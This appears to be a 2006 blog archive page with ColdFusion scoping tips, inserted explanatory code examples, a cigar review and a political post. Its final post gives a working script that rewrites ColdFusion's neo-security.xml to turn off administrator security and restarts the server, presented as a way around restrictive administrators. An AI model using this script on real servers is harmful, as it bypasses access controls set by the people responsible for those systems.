Aarrgghh!!

One guy's take on the web, programming, cigars, politics, Philadelphia, and whatever else comes to mind.

November 2006 Archives

Why Isn't There a Local Scope?

November 30, 2006

I was giving a presentation today on CFCs, and was explaining the difference between the variables scope, the 'local' scope, the this scope, and the arguments scope. It was incredibly hard to explain, mostly because an unscoped variable in a CFC function can refer to either a local, variables-scoped, or arguments-scoped variable.

It made me think, why didn't they just create another default scope named 'local'?

However, I realize the ColdFusion development team has some noggin-horsepower, so I'm sure there is a good reason. I just can't think of it.
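To make the ambiguity concrete, here is a small component that reads the same unscoped name under different conditions. This is an added illustration, not code from the original post; the component name Scopes and the variable name label are invented for the example.

```cfml
<!--- Scopes.cfc: added illustration (not from the post) of why an unscoped
      name inside a CFC method is ambiguous. Component and variable names
      are invented for the example. --->
<cfcomponent output="false">

    <!--- Pseudo-constructor: one value in the variables scope, one in this. --->
    <cfset variables.label = "variables scope" />
    <cfset this.label = "this scope" />

    <cffunction name="whichLabel" access="public" returntype="struct" output="false">
        <cfargument name="label" type="string" required="false" />
        <cfset var out = StructNew() />

        <!--- For an unscoped name ColdFusion checks the function's local (var)
              variables first, then arguments, then the variables scope. The
              this scope is never consulted for an unscoped lookup, so an
              unscoped 'label' means different things depending on whether the
              caller passed an argument. --->
        <cfset out.unscoped = label />

        <!--- Explicit scoping removes the ambiguity. --->
        <cfif StructKeyExists(arguments, "label")>
            <cfset out.fromArguments = arguments.label />
        <cfelse>
            <cfset out.fromArguments = "(not passed)" />
        </cfif>
        <cfset out.fromVariables = variables.label />
        <cfset out.fromThis = this.label />
        <cfreturn out />
    </cffunction>

    <cffunction name="localWins" access="public" returntype="string" output="false">
        <!--- A var-scoped local of the same name shadows variables.label. --->
        <cfset var label = "local (var) scope" />
        <cfreturn label />
    </cffunction>

</cfcomponent>

<!--- Calling page, separate file. --->
<cfset s = CreateObject("component", "Scopes") />
<cfset a = s.whichLabel("arguments scope") />
<cfset b = s.whichLabel() />
<cfset c = s.localWins() />
```

Calling whichLabel with an argument makes the unscoped read resolve to the argument; calling it without one makes the very same line resolve to the variables scope; and in localWins the var-scoped local shadows both. Writing arguments.label, variables.label or a var declaration explicitly, as the fromX fields do, is the only way to make a reader certain which one you meant.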


November 30, 2006 Posted by Terrence Ryan at 3:13 PM

ColdFusion, Web Development,

Rocky Patel Vintage Connecticut 1999 Robusto

November 16, 2006

Country of Origin: Honduras
Length: 5.5"
Ring: 50
Type:
Flavor: full side of medium
Wrapper Type: Natural
Wrapper Tobacco: Connecticut Shade
Binder Tobacco: Nicaraguan
Filler Tobacco: Nicaraguan, Dominican

Date Cigar Smoked: November 16, 2007
Cost for One: $6.50
Construction Rating: 9
Taste Rating: 8
Value Rating: 8
Overall: 8.3
Purchased At: Holt's Cigar Company
Tastes: cocoa, cream
Notes:

Can Rocky Patel make a bad cigar? I bought this last week, but didn't smoke it until today. It kept well, and smoked like a dream. It's the first time in a very long time I've gotten the taste of cream from a cigar. It's in the same price range as Ashton and Griffins, but I've got to say this might be better than both.


November 16, 2006 Posted by Terrence Ryan at 8:44 PM

Cigar Reviews, Cigars,

I'm a This-Scoping Fool

November 9, 2006

Hey, ColdFusion experts! Remember when you said "Just don't use the This scope in CFCs."?
And then I said "No, I can totally use it."
And then you said "No, you totally can't"
And then I was all like "I totally can!"
Yeah?
Well I was totally wrong.

(In case you're wondering, this conversation happened entirely in my head.)

We were having a weird issue with one of our applications. It uses cookie-based authentication that was written centrally into a CFC, and every once in a while users were getting someone else's information. We couldn't track it down. The CFC was all properly var scoped. However, it turns out that it was using the This scope to return the results of each function, and the CFC was instantiated in the application scope of the calling application. So things like this were happening:

  • User 1 authenticates.
  • Application.Obj.username is set to User1
  • User2 authenticates
  • Application.Obj.username is set to User2
  • User1 sets session.username to Application.Obj.username
  • User2 sets session.username to Application.Obj.username
  • Both are User2 in their session

This is dumb stuff from me. At the time I wrote it, like a year and a half ago, I assumed no one would instantiate the CFC in the application scope. But now time has proven me wrong. It just goes to show that no matter how small your application is, or how narrowly you think it is going to be used, always follow best practices unless you have a specific reason not to. If I had just returned the proper response from the function instead of setting it in the this scope, I wouldn't be rewriting code and trying not to break existing calls to this central CFC in 20 or so applications by 10 or so different developers.
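Here is what the fix looks like in code, as an added example rather than the actual CFC from the post. The datasource name myDSN, the users table and its username and token columns, and the cookie name authToken are all assumptions; the post names none of them.

```cfml
<!--- Auth.cfc, written the way the post says it should have been written.
      Assumed for the example: a datasource "myDSN", a table "users" with
      columns username and token, and a cookie named authToken. --->
<cfcomponent output="false">

    <cffunction name="authenticate" access="public" returntype="struct" output="false">
        <cfargument name="token" type="string" required="true" />
        <!--- All var declarations first. The cfquery result is var scoped too,
              so it lives only in this request's call frame. --->
        <cfset var result = StructNew() />
        <cfset var qUser = "" />

        <cfset result.authenticated = false />
        <cfset result.username = "" />

        <cfquery name="qUser" datasource="myDSN">
            SELECT username
            FROM users
            WHERE token = <cfqueryparam value="#arguments.token#" cfsqltype="cf_sql_varchar" />
        </cfquery>

        <cfif qUser.recordCount EQ 1>
            <cfset result.authenticated = true />
            <cfset result.username = qUser.username />
        </cfif>

        <!--- The original stored the answer on the object instead:
                  <cfset this.username = qUser.username />
              With one instance in the application scope that is a single
              field shared by every concurrent request, which is the race
              described above. Returning it per call removes the shared state. --->
        <cfreturn result />
    </cffunction>

</cfcomponent>

<!--- Calling page, separate file. Keeping the instance in the application
      scope is now safe because nothing request-specific is stored on it. --->
<cfif NOT StructKeyExists(application, "auth")>
    <cfset application.auth = CreateObject("component", "Auth") />
</cfif>

<cfparam name="cookie.authToken" default="" />
<cfset authResult = application.auth.authenticate(cookie.authToken) />
<cfif authResult.authenticated>
    <cflock scope="session" type="exclusive" timeout="5">
        <cfset session.username = authResult.username />
    </cflock>
</cfif>
```

The rule this encodes: an object that is shared across requests may hold configuration and behaviour, but every per-request value must travel through arguments and return values. The same mistake shows up whenever a singleton caches the "current user" on itself, whatever the language.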


November 9, 2006 Posted by Terrence Ryan at 3:13 PM

ColdFusion, Web Development,

Don't Let the Man-On-Dog-Sex Hit You On Your Way Out

November 7, 2006

At last, I now feel 50% less ashamed saying "I grew up in New Jersey, but live in Pennsylvania."

Rick Santorum is no longer my Senator.

For those who don't understand the Man-On-Dog-Sex thing.


November 7, 2006 Posted by Terrence Ryan at 11:42 PM

Philly, Politics,

Var Scoping ColdFusion Tag-Specific Variables

I came across this issue during a code review, and thought it might be of note. Specifically, a use of cfstoredproc.StatusCode inspired this.

You know that rule about var scoping all variables called in a function unless they are specifically needed elsewhere? Well don't forget to do it to most of the "ColdFusion tag-specific variables." They are:

  • cfdirectory
  • cffile
  • cfftp
  • cfhttp
  • cfindex
  • cfldap
  • cfpop
  • cfquery
  • cfregistry
  • cfsearch
  • cfstoredproc

Anything that returns a simple value (string, numeric, Boolean) or even arrays and queries can be var scoped at the head of the function with an empty string. (Although for every type but query I like to initialize it with the correct data type.) Structs, however, have to be initialized with a StructNew().

I omit from the list:

  • cfcatch
  • cferror

CFcatch only exists during the execution of a cfcatch block and is accessible only by code in that block. In any case, my normal test for variable scope leakage doesn't detect it, so I'm assuming it's a special case. If anyone knows differently, please let me know. Likewise, CFerror only exists in the page referenced by a cferror tag, which probably couldn't be in a CFC call. (But I could be wrong.)
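A component that applies the rule to two of the tags on the list, with a leak check built in, as an added example (not code from the post). cfhttp populates a struct, so it gets StructNew(); the cfdirectory result is a query, so an empty string is enough. The component name Fetcher, the method names and the URL are assumptions for the example.

```cfml
<!--- Fetcher.cfc: added example of var scoping ColdFusion tag-specific
      variables. Names are invented for illustration. --->
<cfcomponent output="false">

    <cffunction name="fetch" access="public" returntype="struct" output="false">
        <cfargument name="url" type="string" required="true" />
        <!--- Every var declaration must precede any other statement in the
              function. Without the first two lines, cfhttp and qDir would be
              written into this component's variables scope and shared by
              every caller of the instance. --->
        <cfset var cfhttp = StructNew() />
        <cfset var qDir = "" />
        <cfset var result = StructNew() />
        <cfset var tmpPath = GetTempFile(GetTempDirectory(), "fetch") />

        <cfhttp url="#arguments.url#" method="get" timeout="10" />
        <cfset result.statusCode = cfhttp.statusCode />

        <!--- Write the body to a unique temp file and list it back with
              cfdirectory, purely to exercise a query-typed tag variable. --->
        <cffile action="write" file="#tmpPath#" output="#cfhttp.fileContent#" />
        <cfdirectory action="list" directory="#GetDirectoryFromPath(tmpPath)#"
                     name="qDir" filter="#GetFileFromPath(tmpPath)#" />
        <cfif qDir.recordCount EQ 1>
            <cfset result.bytesWritten = qDir.size />
        <cfelse>
            <cfset result.bytesWritten = 0 />
        </cfif>
        <cffile action="delete" file="#tmpPath#" />

        <cfreturn result />
    </cffunction>

    <!--- Leak check: after fetch() has run, none of its working variables
          should be present in the component's variables scope. --->
    <cffunction name="leakedTagVariables" access="public" returntype="string" output="false">
        <cfset var leaked = "" />
        <cfset var name = "" />
        <cfloop list="cfhttp,qDir,tmpPath" index="name">
            <cfif StructKeyExists(variables, name)>
                <cfset leaked = ListAppend(leaked, name) />
            </cfif>
        </cfloop>
        <cfreturn leaked />
    </cffunction>

</cfcomponent>

<!--- Calling page, separate file. --->
<cfset fetcher = CreateObject("component", "Fetcher") />
<cfset r = fetcher.fetch("http://www.example.com/") />
<cfoutput>#r.statusCode#, #r.bytesWritten# bytes, leaked: [#fetcher.leakedTagVariables()#]</cfoutput>
```

With the var lines in place, leakedTagVariables() comes back empty. Delete the `var cfhttp` and `var qDir` lines and it lists both names, which is the quickest way to show a reviewer that a tag result variable behaves no differently from any other unscoped variable in a CFC method.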


November 7, 2006 Posted by Terrence Ryan at 11:35 AM

ColdFusion, Web Development,

Hacking ColdFusion - Disable Administrator Security

November 2, 2006

During MAX 2006 I attended the ColdFusion CFC Birds of a Feather. Someone was complaining about the fact that their administrators were too restrictive despite not understanding the ColdFusion service. They were unable to see CFC introspection because of an administrator password. So I suggested they disable security programmatically.

After thinking about it for awhile, I decided that it was an interesting challenge. I looked at it a couple different ways, and finally settled on this solution:

<!--- Grab the security file contents --->
<cffile action="read" file="#server.ColdFusion.rootdir#\lib\neo-security.xml" variable="rawfilecontents" />

<!--- Convert it to a structure --->
<cfwddx action="wddx2cfml" input="#rawfilecontents#" output="loginfo" />

<!--- Change the setting ---> 
<cfset loginfo["admin.security.enabled"] = JavaCast("boolean", false) />

<!--- Convert back to WDDX --->
<cfwddx action="cfml2wddx" input="#loginfo#" output="fileToWrite" />

<!--- Write it back to the disk.  --->
<cffile action="write" addnewline="yes" file="#server.ColdFusion.rootdir#\lib\neo-security.xml" output="#fileToWrite#" fixnewline="no" />

<!--- This seems to restart the server eventually.  I had to rerun it several times to get it to work.  --->
<cfset serverFactory = CreateObject("java", "coldfusion.server.ServiceFactory") />
<cfset runTimeService = serverFactory.RuntimeService />
<cfset runTimeService.ReStart() />

You have to run it a couple times before it kicks in.

Now, it is important to point out the following:

  1. If proper sandboxing is enabled, this won't work.
  2. If proper IIS restrictions on CFIDE\administrator are set, this won't work.
  3. You should never do this on a hosted server as it will probably violate your hosting agreement.
  4. I'm not advocating messing with your administrators.
  5. But you totally could.


November 2, 2006 Posted by Terrence Ryan at 12:28 AM

ColdFusion, Web Development,